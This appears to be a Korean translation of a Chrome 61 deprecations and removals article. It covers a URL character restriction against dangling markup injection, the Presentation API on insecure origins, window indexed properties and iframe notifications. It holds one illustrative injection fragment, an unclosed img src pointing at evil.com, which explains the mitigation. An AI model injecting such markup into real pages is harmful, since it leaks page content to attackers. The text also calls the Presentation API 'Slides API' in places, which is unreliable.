거의 모든 Chrome 버전에서 제품, 성능, 웹 플랫폼의 기능과 관련된 수많은 업데이트와 개선사항이 확인되었습니다. 이 도움말에서는 8월 3일 현재 베타 버전인 Chrome 61의 지원 중단 및 삭제에 관해 설명합니다. 이 목록은 언제든지 변경될 수 있습니다.
보안 및 개인 정보 보호
URL에 '\n' 및 '<' 문자가 포함된 리소스 차단
잘린 URL을 사용하여 외부 엔드포인트로 데이터를 전송하는 댕글링 마크업 삽입이라고 하는 해킹 유형이 있습니다. 예를 들어 <img src='https://evil.com/?가 포함된 페이지를 가정해 보겠습니다. URL에 닫는 따옴표가 없으므로 브라우저는 다음에 나오는 따옴표를 읽고 닫힌 문자를 단일 URL처럼 취급합니다.
Chrome 61에서는 href 및 src 속성에 허용되는 문자 집합을 제한하여 이 취약점을 완화합니다. 특히 Chrome은 새로운 줄 문자 (\n) 및 문자 미만 (<)이 발견되면 URL 처리를 중지합니다.
적법한 사용 사례가 있고 URL에서 글자 수가 적은 개발자는 이러한 문자를 이스케이프 처리해야 합니다.
삭제 의도 | Chromestatus Tracker | Chromium 버그
안전하지 않은 컨텍스트에서 프레젠테이션 API 지원 중단 및 삭제
안전하지 않은 출처에서는 Slides API가 안전하지 않은 출처의 해킹 벡터로 사용될 수 있는 것으로 확인되었습니다. 디스플레이에는 주소 표시줄이 없으므로 API를 사용하여 콘텐츠를 스푸핑할 수 있습니다. 프레젠테이션 실행 중 데이터를 유출할 수도 있습니다.
Google은 안전하지 않은 출처의 강력한 기능을 삭제하려는 Blink의 목표에 따라 안전하지 않은 컨텍스트에 관한 Slides API 지원을 중단하고 삭제할 계획입니다. Chrome 61부터 PresentationRequest.start()는 안전하지 않은 출처에서 더 이상 작동하지 않습니다.
삭제 의도 | Chromestatus Tracker | Chromium 버그
JavaScript
창에서 색인이 생성된 속성 정의 허용 안함
이전에는 일부 브라우저에서 다음과 같은 자바스크립트 할당을 허용했습니다.
window[0] = 1;
현재 HTML 사양에 따르면 이는 자바스크립트 사양을 명시적으로 위반하는 것입니다. 따라서 이 기능은 Chrome 61에서 삭제됩니다. 2016년 2월부터 Firefox는 이미 이 규정을 준수하고 있습니다.
안전하지 않은 iframe에서 알림 사용 삭제
iframe의 권한 요청은 사용자에게 혼란을 줄 수 있습니다. 포함된 페이지의 출처와 요청을 보낸 iframe의 출처를 구분하기가 어렵기 때문입니다. 요청 범위가 불분명하면 사용자가 권한 부여 또는 거부 여부를 판단하기 어렵습니다.
또한 iframe에서 알림을 허용하지 않으면 알림 권한 요구사항이 푸시 알림의 요구사항과 일치되어 개발자가 불편을 겪을 수 있습니다.
이 기능이 필요한 개발자는 새 창을 열어 알림 권한을 요청할 수 있습니다.